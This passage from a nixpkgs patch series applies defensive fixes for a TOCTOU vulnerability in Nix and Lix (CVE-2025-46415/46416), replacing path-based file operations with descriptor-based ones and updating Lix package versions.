parentfd, const fs::path & path, uint64_t & b + #ifndef _WIN32 + checkInterrupt(); + +- std::string name(baseNameOf(path.native())); ++ std::string name(path.filename()); ++ assert(name != "." && name != ".." && !name.empty()); + + struct stat st; + if (fstatat(parentfd, name.c_str(), &st, +@@ -455,7 +463,7 @@ static void _deletePath(Descriptor parentfd, const fs::path & path, uint64_t & b + throw SysError("chmod %1%", path); + } + +- int fd = openat(parentfd, path.c_str(), O_RDONLY); ++ int fd = openat(parentfd, name.c_str(), O_RDONLY | O_DIRECTORY | O_NOFOLLOW); + if (fd == -1) + throw SysError("opening directory %1%", path); + AutoCloseDir dir(fdopendir(fd)); +@@ -467,7 +475,7 @@ static void _deletePath(Descriptor parentfd, const fs::path & path, uint64_t & b + checkInterrupt(); + std::string childName = dirent->d_name; + if (childName == "." || childName == "..") continue; +- _deletePath(dirfd(dir.get()), path + "/" + childName, bytesFreed); ++ _deletePath(dirfd(dir.get()), path / childName, bytesFreed); + } + if (errno) throw SysError("reading directory %1%", path); + } +@@ -485,14 +493,13 @@ static void _deletePath(Descriptor parentfd, const fs::path & path, uint64_t & b + + static void _deletePath(const fs::path & path, uint64_t & bytesFreed) + { +- Path dir = dirOf(path.string()); +- if (dir == "") +- dir = "/"; ++ assert(path.is_absolute()); ++ assert(path.parent_path() != path); + +- AutoCloseFD dirfd = toDescriptor(open(dir.c_str(), O_RDONLY)); ++ AutoCloseFD dirfd = toDescriptor(open(path.parent_path().string().c_str(), O_RDONLY)); + if (!dirfd) { + if (errno == ENOENT) return; +- throw SysError("opening directory '%1%'", path); ++ throw SysError("opening directory %s", path.parent_path()); + } + + _deletePath(dirfd.get(), path, bytesFreed); +diff --git a/src/libutil/include/nix/util/file-system.hh b/src/libutil/include/nix/util/file-system.hh +index e6b1cfef3..9a0057bbe 100644 +--- a/src/libutil/include/nix/util/file-system.hh ++++ b/src/libutil/include/nix/util/file-system.hh +@@ -193,21 +193,27 @@ std::string readFile(const Path & path); + std::string readFile(const std::filesystem::path & path); + void readFile(const Path & path, Sink & sink); + ++enum struct FsSync { Yes, No }; ++ + /** + * Write a string to a file. + */ +-void writeFile(const Path & path, std::string_view s, mode_t mode = 0666, bool sync = false); +-static inline void writeFile(const std::filesystem::path & path, std::string_view s, mode_t mode = 0666, bool sync = false) ++void writeFile(const Path & path, std::string_view s, mode_t mode = 0666, FsSync sync = FsSync::No); ++ ++static inline void writeFile(const std::filesystem::path & path, std::string_view s, mode_t mode = 0666, FsSync sync = FsSync::No) + { + return writeFile(path.string(), s, mode, sync); + } + +-void writeFile(const Path & path, Source & source, mode_t mode = 0666, bool sync = false); +-static inline void writeFile(const std::filesystem::path & path, Source & source, mode_t mode = 0666, bool sync = false) ++void writeFile(const Path & path, Source & source, mode_t mode = 0666, FsSync sync = FsSync::No); ++ ++static inline void writeFile(const std::filesystem::path & path, Source & source, mode_t mode = 0666, FsSync sync = FsSync::No) + { + return writeFile(path.string(), source, mode, sync); + } + ++void writeFile(AutoCloseFD & fd, const Path & origPath, std::string_view s, mode_t mode = 0666, FsSync sync = FsSync::No); ++ + /** + * Flush a path's parent directory to disk. + */ +-- +2.44.1 + From 923146e9275bd0a4331669c1c9f800fe59253b23 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?J=C3=B6rg=20Thalheim?= Date: Sun, 22 Jun 2025 18:52:59 +0200 Subject: [PATCH 61/73] nixComponents_2_29: add patch for GHSA-g948-229j-48j3 This addresses a TOCTOU (Time-of-Check to Time-of-Use) vulnerability in Nix's build system that could potentially allow privilege escalation or unauthorized file access during the build process. The patch includes: - Safe file operations using file descriptors - Secure temporary directory handling - Safe chown operations - PassAsFile security improvements - Path validation fixes --- pkgs/tools/package-management/nix/default.nix | 28 +- .../patches/ghsa-g948-229j-48j3-2.29.patch | 449 ++++++++++++++++++ 2 files changed, 464 insertions(+), 13 deletions(-) create mode 100644 pkgs/tools/package-management/nix/patches/ghsa-g948-229j-48j3-2.29.patch diff --git a/pkgs/tools/package-management/nix/default.nix b/pkgs/tools/package-management/nix/default.nix index 97fb2eac30ef..449da9289815 100644 --- a/pkgs/tools/package-management/nix/default.nix +++ b/pkgs/tools/package-management/nix/default.nix @@ -189,19 +189,21 @@ lib.makeExtensible ( self_attribute_name = "nix_2_28"; }; - nixComponents_2_29 = nixDependencies.callPackage ./modular/packages.nix rec { - version = "2.29.0"; - inherit (self.nix_2_24.meta) maintainers teams; - otherSplices = generateSplicesForNixComponents "nixComponents_2_29"; - src = fetchFromGitHub { - # FIXME: back to NixOS org once they fix it - owner = "vcunat"; - repo = "nix"; - rev = "p/jq-1.8.0"; # just a tiny test-only patch atop 2.29.0 - # see https://github.com/NixOS/nix/pull/13371 - hash = "sha256-F2ZODsET4cBsgsyOi8Sg/quESU0DnrYri0hYniqu37k="; - }; - }; + nixComponents_2_29 = + (nixDependencies.callPackage ./modular/packages.nix rec { + version = "2.29.0"; + inherit (self.nix_2_24.meta) maintainers teams; + otherSplices = generateSplicesForNixComponents "nixComponents_2_29"; + src = fetchFromGitHub { + # FIXME: back to NixOS org once they fix it + owner = "vcunat"; + repo = "nix"; + rev = "p/jq-1.8.0"; # just a tiny test-only patch atop 2.29.0 + # see https://github.com/NixOS/nix/pull/13371 + hash = "sha256-F2ZODsET4cBsgsyOi8Sg/quESU0DnrYri0hYniqu37k="; + }; + }).appendPatches + [ ./patches/ghsa-g948-229j-48j3-2.29.patch ]; nix_2_29 = addTests "nix_2_29" self.nixComponents_2_29.nix-everything; diff --git a/pkgs/tools/package-management/nix/patches/ghsa-g948-229j-48j3-2.29.patch b/pkgs/tools/package-management/nix/patches/ghsa-g948-229j-48j3-2.29.patch new file mode 100644 index 000000000000..265c2580cfe7 --- /dev/null +++ b/pkgs/tools/package-management/nix/patches/ghsa-g948-229j-48j3-2.29.patch @@ -0,0 +1,449 @@ +From 01619fbe2dc06b79609b95b6f95ddbf4e871e762 Mon Sep 17 00:00:00 2001 +From: Eelco Dolstra +Date: Thu, 19 Jun 2025 16:20:34 +0200 +Subject: [PATCH] Fixes for GHSA-g948-229j-48j3 +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +Squashed commit of the following: + +commit 04fff3a637d455cbb1d75937a235950e43008db9 +Author: Eelco Dolstra +Date: Thu Jun 12 12:30:32 2025 +0200 + + Chown structured attr files safely + +commit 5417ad445e414c649d0cfc71a05661c7bf8f3ef5 +Author: Eelco Dolstra +Date: Thu Jun 12 12:14:04 2025 +0200 + + Replace 'bool sync' with an enum for clarity + + And drop writeFileAndSync(). + +commit 7ae0141f328d8e8e1094be24665789c05f974ba6 +Author: Eelco Dolstra +Date: Thu Jun 12 11:35:28 2025 +0200 + + Drop guessOrInventPathFromFD() + + No need to do hacky stuff like that when we already know the original path. + +commit 45b05098bd019da7c57cd4227a89bfd0fa65bb08 +Author: Eelco Dolstra +Date: Thu Jun 12 11:15:58 2025 +0200 + + Tweak comment + +commit 0af15b31209d1b7ec8addfae9a1a6b60d8f35848 +Author: Raito Bezarius +Date: Thu Mar 27 12:22:26 2025 +0100 + + libstore: ensure that temporary directory is always 0o000 before deletion + + In the case the deletion fails, we should ensure that the temporary + directory cannot be used for nefarious purposes. + + Change-Id: I498a2dd0999a74195d13642f44a5de1e69d46120 + Signed-off-by: Raito Bezarius + +commit 2c20fa37b15cfa03ac6a1a6a47cdb2ed66c0827e +Author: Raito Bezarius +Date: Wed Mar 26 12:42:55 2025 +0100 + + libutil: ensure that `_deletePath` does NOT use absolute paths with dirfds + + When calling `_deletePath` with a parent file descriptor, `openat` is + made effective by using relative paths to the directory file descriptor. + + To avoid the problem, the signature is changed to resist misuse with an + assert in the prologue of the function. + + Change-Id: I6b3fc766bad2afe54dc27d47d1df3873e188de96 + Signed-off-by: Raito Bezarius + +commit d3c370bbcae48bb825ce19fd0f73bb4eefd2c9ea +Author: Raito Bezarius +Date: Wed Mar 26 01:07:47 2025 +0100 + + libstore: ensure that `passAsFile` is created in the original temp dir + + This ensures that `passAsFile` data is created inside the expected + temporary build directory by `openat()` from the parent directory file + descriptor. + + This avoids a TOCTOU which is part of the attack chain of CVE-????. + + Change-Id: Ie5273446c4a19403088d0389ae8e3f473af8879a + Signed-off-by: Raito Bezarius + +commit 45d3598724f932d024ef6bc2ffb00c1bb90e6018 +Author: Raito Bezarius +Date: Wed Mar 26 01:06:03 2025 +0100 + + libutil: writeFile variant for file descriptors + + `writeFile` lose its `sync` boolean flag to make things simpler. + + A new `writeFileAndSync` function is created and all call sites are + converted to it. + + Change-Id: Ib871a5283a9c047db1e4fe48a241506e4aab9192 + Signed-off-by: Raito Bezarius + +commit 732bd9b98cabf4aaf95a01fd318923de303f9996 +Author: Raito Bezarius +Date: Wed Mar 26 01:05:34 2025 +0100 + + libstore: chown to builder variant for file descriptors + + We use it immediately for the build temporary directory. + + Change-Id: I180193c63a2b98721f5fb8e542c4e39c099bb947 + Signed-off-by: Raito Bezarius + +commit 962c65f8dcd5570dd92c72370a862c7b38942e0d +Author: Raito Bezarius +Date: Wed Mar 26 01:04:59 2025 +0100 + + libstore: open build directory as a dirfd as well + + We now keep around a proper AutoCloseFD around the temporary directory + which we plan to use for openat operations and avoiding the build + directory being swapped out while we are doing something else. + + Change-Id: I18d387b0f123ebf2d20c6405cd47ebadc5505f2a + Signed-off-by: Raito Bezarius + +commit c9b42462b75b5a37ee6564c2b53cff186c8323da +Author: Raito Bezarius +Date: Wed Mar 26 01:04:12 2025 +0100 + + libutil: guess or invent a path from file descriptors + + This is useful for certain error recovery paths (no pun intended) that + does not thread through the original path name. + + Change-Id: I2d800740cb4f9912e64c923120d3f977c58ccb7e + Signed-off-by: Raito Bezarius + +Signed-off-by: Jörg Thalheim +--- + src/libstore/local-store.cc | 4 +- + src/libstore/unix/build/derivation-builder.cc | 66 ++++++++++++++++--- + src/libutil/file-content-address.cc | 2 +- + src/libutil/file-system.cc | 47 +++++++------ + src/libutil/include/nix/util/file-system.hh | 14 ++-- + 5 files changed, 98 insertions(+), 35 deletions(-) + +diff --git a/src/libstore/local-store.cc b/src/libstore/local-store.cc +index 76fadba86..1ab3ed13a 100644 +--- a/src/libstore/local-store.cc ++++ b/src/libstore/local-store.cc +@@ -247,7 +247,7 @@ LocalStore::LocalStore(ref config) + else if (curSchema == 0) { /* new store */ + curSchema = nixSchemaVersion; + openDB(*state, true); +- writeFile(schemaPath, fmt("%1%", curSchema), 0666, true); ++ writeFile(schemaPath, fmt("%1%", curSchema), 0666, FsSync::Yes); + } + + else if (curSchema < nixSchemaVersion) { +@@ -298,7 +298,7 @@ LocalStore::LocalStore(ref config) + txn.commit(); + } + +- writeFile(schemaPath, fmt("%1%", nixSchemaVersion), 0666, true); ++ writeFile(schemaPath, fmt("%1%", nixSchemaVersion), 0666, FsSync::Yes); + + lockFile(globalLock.get(), ltRead, true); + } +diff --git a/src/libstore/unix/build/derivation-builder.cc b/src/libstore/unix/build/derivation-builder.cc +index 58e8d8ba6..856bc81c3 100644 +--- a/src/libstore/unix/build/derivation-builder.cc ++++ b/src/libstore/unix/build/derivation-builder.cc +@@ -129,6 +129,11 @@ private: + */ + Path topTmpDir; + ++ /** ++ * The file descriptor of the temporary directory. ++ */ ++ AutoCloseFD tmpDirFd; ++ + /** + * The path of the temporary directory in the sandbox. + */ +@@ -325,9 +330,24 @@ private: + + /** + * Make a file owned by the builder. ++ * ++ * SAFETY: this function is prone to TOCTOU as it receives a path and not a descriptor. ++ * It's only safe to call in a child of a directory only visible to the owner. + */ + void chownToBuilder(const Path & path); + ++ /** ++ * Make a file owned by the builder addressed by its file descriptor. ++ */ ++ void chownToBuilder(int fd, const Path & path); ++ ++ /** ++ * Create a file in `tmpDir` owned by the builder. ++ */ ++ void writeBuilderFile( ++ const std::string & name, ++ std::string_view contents); ++ + /** + * Run the builder's process. + */ +@@ -895,7 +915,14 @@ void DerivationBuilderImpl::startBuilder() + } else { + tmpDir = topTmpDir; + } +- chownToBuilder(tmpDir); ++ ++ /* The TOCTOU between the previous mkdir call and this open call is unavoidable due to ++ POSIX semantics.*/ ++ tmpDirFd = AutoCloseFD{open(tmpDir.c_str(), O_RDONLY | O_NOFOLLOW | O_DIRECTORY)}; ++ if (!tmpDirFd) ++ throw SysError("failed to open the build temporary directory descriptor '%1%'", tmpDir); ++ ++ chownToBuilder(tmpDirFd.get(), tmpDir); + + for (auto & [outputName, status] : initialOutputs) { + /* Set scratch path we'll actually use during the build. +@@ -1469,9 +1496,7 @@ void DerivationBuilderImpl::initTmpDir() + } else { + auto hash = hashString(HashAlgorithm::SHA256, i.first); + std::string fn = ".attr-" + hash.to_string(HashFormat::Nix32, false); +- Path p = tmpDir + "/" + fn; +- writeFile(p, rewriteStrings(i.second, inputRewrites)); +- chownToBuilder(p); ++ writeBuilderFile(fn, rewriteStrings(i.second, inputRewrites)); + env[i.first + "Path"] = tmpDirInSandbox + "/" + fn; + } + } +@@ -1580,11 +1605,9 @@ void DerivationBuilderImpl::writeStructuredAttrs() + + auto jsonSh = StructuredAttrs::writeShell(json); + +- writeFile(tmpDir + "/.attrs.sh", rewriteStrings(jsonSh, inputRewrites)); +- chownToBuilder(tmpDir + "/.attrs.sh"); ++ writeBuilderFile(".attrs.sh", rewriteStrings(jsonSh, inputRewrites)); + env["NIX_ATTRS_SH_FILE"] = tmpDirInSandbox + "/.attrs.sh"; +- writeFile(tmpDir + "/.attrs.json", rewriteStrings(json.dump(), inputRewrites)); +- chownToBuilder(tmpDir + "/.attrs.json"); ++ writeBuilderFile(".attrs.json", rewriteStrings(json.dump(), inputRewrites)); + env["NIX_ATTRS_JSON_FILE"] = tmpDirInSandbox + "/.attrs.json"; + } + } +@@ -1838,6 +1861,24 @@ void setupSeccomp() + #endif + } + ++void DerivationBuilderImpl::chownToBuilder(int fd, const Path & path) ++{ ++ if (!buildUser) return; ++ if (fchown(fd, buildUser->getUID(), buildUser->getGID()) == -1) ++ throw SysError("cannot change ownership of file '%1%'", path); ++} ++ ++void DerivationBuilderImpl::writeBuilderFile( ++ const std::string & name, ++ std::string_view contents) ++{ ++ auto path = std::filesystem::path(tmpDir) / name; ++ AutoCloseFD fd{openat(tmpDirFd.get(), name.c_str(), O_WRONLY | O_TRUNC | O_CREAT | O_CLOEXEC | O_EXCL | O_NOFOLLOW, 0666)}; ++ if (!fd) ++ throw SysError("creating file %s", path); ++ writeFile(fd, path, contents); ++ chownToBuilder(fd.get(), path); ++} + + void DerivationBuilderImpl::runChild() + { +@@ -3043,6 +3084,15 @@ void DerivationBuilderImpl::checkOutputs(const std::mapd_name; + if (childName == "." || childName == "..") continue; +- _deletePath(dirfd(dir.get()), path + "/" + childName, bytesFreed); ++ _deletePath(dirfd(dir.get()), path / childName, bytesFreed); + } + if (errno) throw SysError("reading directory %1%", path); + } +@@ -490,14 +498,13 @@ static void _deletePath(Descriptor parentfd, const std::filesystem::path & path, + + static void _deletePath(const std::filesystem::path & path, uint64_t & bytesFreed) + { +- Path dir = dirOf(path.string()); +- if (dir == "") +- dir = "/"; ++ assert(path.is_absolute()); ++ assert(path.parent_path() != path); + +- AutoCloseFD dirfd = toDescriptor(open(dir.c_str(), O_RDONLY)); ++ AutoCloseFD dirfd = toDescriptor(open(path.parent_path().string().c_str(), O_RDONLY)); + if (!dirfd) { + if (errno == ENOENT) return; +- throw SysError("opening directory '%1%'", path); ++ throw SysError("opening directory %s", path.parent_path()); + } + + _deletePath(dirfd.get(), path, bytesFreed); +diff --git a/src/libutil/include/nix/util/file-system.hh b/src/libutil/include/nix/util/file-system.hh +index b8fa4cfa0..a9a6e43bf 100644 +--- a/src/libutil/include/nix/util/file-system.hh ++++ b/src/libutil/include/nix/util/file-system.hh +@@ -175,21 +175,27 @@ std::string readFile(const Path & path); + std::string readFile(const std::filesystem::path & path); + void readFile(const Path & path, Sink & sink, bool memory_map = true); + ++enum struct FsSync { Yes, No }; ++ + /** + * Write a string to a file. + */ +-void writeFile(const Path & path, std::string_view s, mode_t mode = 0666, bool sync = false); +-static inline void writeFile(const std::filesystem::path & path, std::string_view s, mode_t mode = 0666, bool sync = false) ++void writeFile(const Path & path, std::string_view s, mode_t mode = 0666, FsSync sync = FsSync::No); ++ ++static inline void writeFile(const std::filesystem::path & path, std::string_view s, mode_t mode = 0666, FsSync sync = FsSync::No) + { + return writeFile(path.string(), s, mode, sync); + } + +-void writeFile(const Path & path, Source & source, mode_t mode = 0666, bool sync = false); +-static inline void writeFile(const std::filesystem::path & path, Source & source, mode_t mode = 0666, bool sync = false) ++void writeFile(const Path & path, Source & source, mode_t mode = 0666, FsSync sync = FsSync::No); ++ ++static inline void writeFile(const std::filesystem::path & path, Source & source, mode_t mode = 0666, FsSync sync = FsSync::No) + { + return writeFile(path.string(), source, mode, sync); + } + ++void writeFile(AutoCloseFD & fd, const Path & origPath, std::string_view s, mode_t mode = 0666, FsSync sync = FsSync::No); ++ + /** + * Flush a path's parent directory to disk. + */ +-- +2.44.1 + From ccae07c83616b952afce5cfea6ae4d1894f1bc76 Mon Sep 17 00:00:00 2001 From: "R. Ryantm" Date: Tue, 24 Jun 2025 14:18:13 +0000 Subject: [PATCH 62/73] expected-lite: 0.8.0 -> 0.9.0 --- pkgs/by-name/ex/expected-lite/package.nix | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/pkgs/by-name/ex/expected-lite/package.nix b/pkgs/by-name/ex/expected-lite/package.nix index 80e94ff8815d..a221daa4ba56 100644 --- a/pkgs/by-name/ex/expected-lite/package.nix +++ b/pkgs/by-name/ex/expected-lite/package.nix @@ -8,13 +8,13 @@ stdenv.mkDerivation rec { pname = "expected-lite"; - version = "0.8.0"; + version = "0.9.0"; src = fetchFromGitHub { owner = "martinmoene"; repo = "expected-lite"; rev = "v${version}"; - hash = "sha256-8Lf+R7wC7f2YliXqhR6pwVVSLZ6qheu7YOV5jHc0Cjc="; + hash = "sha256-LRXxUaDQT5q9dXK2uYFvCgEuGWEHKr95lfdGTGjke0g="; }; nativeBuildInputs = [ From c2da8de4d1d618e830b0a18e09626e2fbdf6560b Mon Sep 17 00:00:00 2001 From: Raito Bezarius Date: Tue, 24 Jun 2025 15:43:15 +0200 Subject: [PATCH 63/73] lixPackageSets.lix_2_90: mark as vulnerable Change-Id: I10fedc7098aaddb0df67acb76fe730ddd8883319 Signed-off-by: Raito Bezarius --- pkgs/tools/package-management/lix/common-lix.nix | 2 ++ pkgs/tools/package-management/lix/default.nix | 4 ++++ 2 files changed, 6 insertions(+) diff --git a/pkgs/tools/package-management/lix/common-lix.nix b/pkgs/tools/package-management/lix/common-lix.nix index 9b666e5e78fb..077c4617698c 100644 --- a/pkgs/tools/package-management/lix/common-lix.nix +++ b/pkgs/tools/package-management/lix/common-lix.nix @@ -9,6 +9,7 @@ # `lix-doc`. docCargoDeps ? null, patches ? [ ], + knownVulnerabilities ? [ ], }@args: assert lib.assertMsg ( @@ -389,5 +390,6 @@ stdenv.mkDerivation (finalAttrs: { platforms = lib.platforms.unix; outputsToInstall = [ "out" ] ++ lib.optional enableDocumentation "man"; mainProgram = "nix"; + inherit knownVulnerabilities; }; }) diff --git a/pkgs/tools/package-management/lix/default.nix b/pkgs/tools/package-management/lix/default.nix index c6d905d78048..44003670e12d 100644 --- a/pkgs/tools/package-management/lix/default.nix +++ b/pkgs/tools/package-management/lix/default.nix @@ -133,6 +133,10 @@ lib.makeExtensible (self: { sourceRoot = "${src.name or src}/lix-doc"; hash = "sha256-VPcrf78gfLlkTRrcbLkPgLOk0o6lsOJBm6HYLvavpNU="; }; + + knownVulnerabilities = [ + "Lix 2.90 is vulnerable to CVE-2025-46415 and CVE-2025-46416 and will not receive updates." + ]; }; nix-eval-jobs-args = { From be4026079c96792b6cc0723bd3b40c72b8202060 Mon Sep 17 00:00:00 2001 From: Raito Bezarius Date: Tue, 24 Jun 2025 15:43:37 +0200 Subject: [PATCH 64/73] lixPackageSets.lix_2_91: patch for CVE-2025-4641{5,6} Change-Id: I8042bca710f047ca3c312c6fa7c8227d96f328d4 Signed-off-by: Raito Bezarius --- pkgs/tools/package-management/lix/default.nix | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/pkgs/tools/package-management/lix/default.nix b/pkgs/tools/package-management/lix/default.nix index 44003670e12d..6deb817e9151 100644 --- a/pkgs/tools/package-management/lix/default.nix +++ b/pkgs/tools/package-management/lix/default.nix @@ -154,13 +154,13 @@ lib.makeExtensible (self: { attrName = "lix_2_91"; lix-args = rec { - version = "2.91.1"; + version = "2.91.2"; src = fetchFromGitHub { owner = "lix-project"; repo = "lix"; rev = version; - hash = "sha256-hiGtfzxFkDc9TSYsb96Whg0vnqBVV7CUxyscZNhed0U="; + hash = "sha256-TkRjskDnxMPugdLQE/LqIh59RYQFJLYpIuL8YZva2lM="; }; docCargoDeps = rustPlatform.fetchCargoVendor { From 69bd6a53159da314523febbaa597810952131c34 Mon Sep 17 00:00:00 2001 From: Raito Bezarius Date: Tue, 24 Jun 2025 15:44:48 +0200 Subject: [PATCH 65/73] lixPackageSets.lix_2_93: patch for CVE-2025-4641{5,6} Change-Id: I724ca7bc993594d8b1b262202e423021f6288548 Signed-off-by: Raito Bezarius --- pkgs/tools/package-management/lix/default.nix | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/pkgs/tools/package-management/lix/default.nix b/pkgs/tools/package-management/lix/default.nix index 6deb817e9151..00876663b1b0 100644 --- a/pkgs/tools/package-management/lix/default.nix +++ b/pkgs/tools/package-management/lix/default.nix @@ -216,14 +216,14 @@ lib.makeExtensible (self: { attrName = "lix_2_93"; lix-args = rec { - version = "2.93.0"; + version = "2.93.1"; src = fetchFromGitea { domain = "git.lix.systems"; owner = "lix-project"; repo = "lix"; rev = version; - hash = "sha256-hsFe4Tsqqg4l+FfQWphDtjC79WzNCZbEFhHI8j2KJzw="; + hash = "sha256-LmQhjQ7c+AOkwhvR9GFgJOy8oHW35MoQRELtrwyVnPw="; }; cargoDeps = rustPlatform.fetchCargoVendor { From dc090e801c261f2bb6f7593062fc6215db73c2bd Mon Sep 17 00:00:00 2001 From: Raito Bezarius Date: Tue, 24 Jun 2025 16:22:39 +0200 Subject: [PATCH 66/73] lixPackageSets.lix_2_92: patch for CVE-2025-4641{5,6} Change-Id: Ie7ec879d499be1e67982871659f3a414157a329d Signed-off-by: Raito Bezarius --- pkgs/tools/package-management/lix/default.nix | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/pkgs/tools/package-management/lix/default.nix b/pkgs/tools/package-management/lix/default.nix index 00876663b1b0..b5e92d698bff 100644 --- a/pkgs/tools/package-management/lix/default.nix +++ b/pkgs/tools/package-management/lix/default.nix @@ -186,13 +186,13 @@ lib.makeExtensible (self: { attrName = "lix_2_92"; lix-args = rec { - version = "2.92.0"; + version = "2.92.2"; src = fetchFromGitHub { owner = "lix-project"; repo = "lix"; rev = version; - hash = "sha256-CCKIAE84dzkrnlxJCKFyffAxP3yfsOAbdvydUGqq24g="; + hash = "sha256-D7YepvFkGE4K1rOkEYA1P6wGj/eFbQXb03nLdBRjjwA="; }; cargoDeps = rustPlatform.fetchCargoVendor { From cafe161f051c38854b93079d71603781ae14e03a Mon Sep 17 00:00:00 2001 From: Raito Bezarius Date: Tue, 24 Jun 2025 16:23:24 +0200 Subject: [PATCH 67/73] lixPackageSets.git: patch for CVE-2025-4641{5,6} Change-Id: I5990ddd1d7eb16ca5023d4496550d67c4e361bc9 Signed-off-by: Raito Bezarius --- pkgs/tools/package-management/lix/default.nix | 4 + .../LIX_HEAD_CVE-2025-46415_46416.patch | 2363 +++++++++++++++++ 2 files changed, 2367 insertions(+) create mode 100644 pkgs/tools/package-management/lix/patches/LIX_HEAD_CVE-2025-46415_46416.patch diff --git a/pkgs/tools/package-management/lix/default.nix b/pkgs/tools/package-management/lix/default.nix index b5e92d698bff..b348407056f3 100644 --- a/pkgs/tools/package-management/lix/default.nix +++ b/pkgs/tools/package-management/lix/default.nix @@ -253,6 +253,10 @@ lib.makeExtensible (self: { inherit src; hash = "sha256-YMyNOXdlx0I30SkcmdW/6DU0BYc3ZOa2FMJSKMkr7I8="; }; + + patches = [ + ./patches/LIX_HEAD_CVE-2025-46415_46416.patch + ]; }; }; diff --git a/pkgs/tools/package-management/lix/patches/LIX_HEAD_CVE-2025-46415_46416.patch b/pkgs/tools/package-management/lix/patches/LIX_HEAD_CVE-2025-46415_46416.patch new file mode 100644 index 000000000000..130aa2e5eaf3 --- /dev/null +++ b/pkgs/tools/package-management/lix/patches/LIX_HEAD_CVE-2025-46415_46416.patch @@ -0,0 +1,2363 @@ +From c7976e63a3d93386b2811dba2b92ba452c561696 Mon Sep 17 00:00:00 2001 +From: Raito Bezarius +Date: Wed, 26 Mar 2025 01:04:12 +0100 +Subject: [SECURITY FIX 01/12] libutil: guess or invent a path from file + descriptors + +This is useful for certain error recovery paths (no pun intended) that +does not thread through the original path name. + +Change-Id: I2d800740cb4f9912e64c923120d3f977c58ccb7e +Signed-off-by: Raito Bezarius +--- + lix/libutil/file-descriptor.cc | 23 ++++++++++ + lix/libutil/file-descriptor.hh | 18 ++++++++ + meson.build | 5 +++ + tests/unit/libutil/tests.cc | 81 ++++++++++++++++++++++++++++++++++ + 4 files changed, 127 insertions(+) + +diff --git a/lix/libutil/file-descriptor.cc b/lix/libutil/file-descriptor.cc +index 39a4e0bdd..83496b6a6 100644 +--- a/lix/libutil/file-descriptor.cc ++++ b/lix/libutil/file-descriptor.cc +@@ -155,6 +155,29 @@ int AutoCloseFD::get() const + return fd; + } + ++std::string guessOrInventPathFromFD(int fd) ++{ ++ assert(fd >= 0); ++ /* On Linux, there's no F_GETPATH available. ++ * But we can read /proc/ */ ++#if __linux__ ++ try { ++ return readLink(fmt("/proc/self/fd/%1%", fd).c_str()); ++ } catch (...) { ++ } ++#elif defined (HAVE_F_GETPATH) && HAVE_F_GETPATH ++ std::string fdName(PATH_MAX, '\0'); ++ if (fcntl(fd, F_GETPATH, fdName.data()) != -1) { ++ fdName.resize(strlen(fdName.c_str())); ++ return fdName; ++ } ++#else ++#error "No implementation for retrieving file descriptors path." ++#endif ++ ++ return fmt("", fd); ++} ++ + + void AutoCloseFD::close() + { +diff --git a/lix/libutil/file-descriptor.hh b/lix/libutil/file-descriptor.hh +index 5331751cb..6c1c698fc 100644 +--- a/lix/libutil/file-descriptor.hh ++++ b/lix/libutil/file-descriptor.hh +@@ -36,6 +36,15 @@ void writeFull(int fd, std::string_view s, bool allowInterrupts = true); + */ + std::string drainFD(int fd, bool block = true, const size_t reserveSize=0); + ++ ++/* ++ * Will attempt to guess *A* path associated that might lead to the same file as used by this ++ * file descriptor. ++ * ++ * The returned string should NEVER be used as a valid path. ++ */ ++std::string guessOrInventPathFromFD(int fd); ++ + Generator drainFDSource(int fd, bool block = true); + + class AutoCloseFD +@@ -50,6 +59,15 @@ public: + AutoCloseFD& operator =(const AutoCloseFD & fd) = delete; + AutoCloseFD& operator =(AutoCloseFD&& fd) noexcept(false); + int get() const; ++ ++ /* ++ * Will attempt to guess *A* path associated that might lead to the same file as used by this ++ * file descriptor. ++ * ++ * The returned string should NEVER be used as a valid path. ++ */ ++ std::string guessOrInventPath() const { return guessOrInventPathFromFD(fd); } ++ + explicit operator bool() const; + int release(); + void close(); +diff --git a/meson.build b/meson.build +index f0443bbd1..92b4c05ec 100644 +--- a/meson.build ++++ b/meson.build +@@ -266,6 +266,11 @@ configdata += { + 'HAVE_SECCOMP': seccomp.found().to_int(), + } + ++# fcntl(F_GETPATH) returns the path of an fd on macOS and BSDs ++configdata += { ++ 'HAVE_F_GETPATH': cxx.has_header_symbol('fcntl.h', 'F_GETPATH').to_int(), ++} ++ + libarchive = dependency('libarchive', required : true, include_type : 'system') + + brotli = [ +diff --git a/tests/unit/libutil/tests.cc b/tests/unit/libutil/tests.cc +index 3b865cb82..263fd7834 100644 +--- a/tests/unit/libutil/tests.cc ++++ b/tests/unit/libutil/tests.cc +@@ -3,6 +3,8 @@ + #include "lix/libutil/strings.hh" + #include "lix/libutil/types.hh" + #include "lix/libutil/terminal.hh" ++#include "lix/libutil/unix-domain-socket.hh" ++#include "tests/test-data.hh" + + #include + +@@ -207,6 +209,85 @@ namespace nix { + ASSERT_FALSE(pathExists("/schnitzel/darmstadt/pommes")); + } + ++ /* ---------------------------------------------------------------------------- ++ * AutoCloseFD::guessOrInventPath ++ * --------------------------------------------------------------------------*/ ++ void testGuessOrInventPathPrePostDeletion(AutoCloseFD & fd, Path & path) { ++ { ++ SCOPED_TRACE(fmt("guessing path before deletion of '%1%'", path)); ++ ASSERT_TRUE(fd); ++ /* We cannot predict what the platform will return here. ++ * But it cannot fail. */ ++ ASSERT_TRUE(fd.guessOrInventPath().size() >= 0); ++ } ++ { ++ SCOPED_TRACE(fmt("guessing path after deletion of '%1%'", path)); ++ deletePath(path); ++ /* We cannot predict what the platform will return here. ++ * But it cannot fail. */ ++ ASSERT_TRUE(fd.guessOrInventPath().size() >= 0); ++ } ++ } ++ TEST(guessOrInventPath, files) { ++ Path filePath = getUnitTestDataPath("guess-or-invent/test.txt"); ++ createDirs(dirOf(filePath)); ++ writeFile(filePath, "some text"); ++ AutoCloseFD file{open(filePath.c_str(), O_RDONLY, 0666)}; ++ testGuessOrInventPathPrePostDeletion(file, filePath); ++ } ++ ++ TEST(guessOrInventPath, directories) { ++ Path dirPath = getUnitTestDataPath("guess-or-invent/test-dir"); ++ createDirs(dirPath); ++ AutoCloseFD directory{open(dirPath.c_str(), O_DIRECTORY, 0666)}; ++ testGuessOrInventPathPrePostDeletion(directory, dirPath); ++ } ++ ++#ifdef O_PATH ++ 